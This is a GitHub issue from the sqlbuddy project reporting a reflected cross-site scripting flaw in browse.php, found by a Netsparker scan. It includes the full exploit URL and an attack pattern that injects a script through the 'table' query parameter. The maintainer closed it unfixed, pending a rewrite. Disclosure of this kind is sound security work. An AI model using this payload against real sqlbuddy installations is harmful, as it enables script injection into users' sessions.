Cross-Site Scripting in 'browse.php' - Githubissues

deliciousbrains / sqlbuddy

phpMyAdmin alternative with a focus on usability

http://sqlbuddy.com

MIT License

188 stars 54 forks source link

Cross-Site Scripting in 'browse.php' #9

Closed omarkurt closed 8 years ago

omarkurt commented 10 years ago

Netsparker Found XSS in browse.php

Url: http://example.com/sqlbuddy/browse.php?ajaxRequest=89&requestKey=be91e6d9714bb1c4&db=information_schema&table='"--></style></scRipt><scRipt>alert(0x000290)</scRipt> Parameter Name: table
Parameter Type: Querystring
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000290)</scRipt>

Reference: https://www.netsparker.com/crosssite-scripting-xss/ https://www.netsparker.com/netsparker-advisories/

gilbitron commented 8 years ago

Closing this as we are planning a ground up rewrite for v2.0.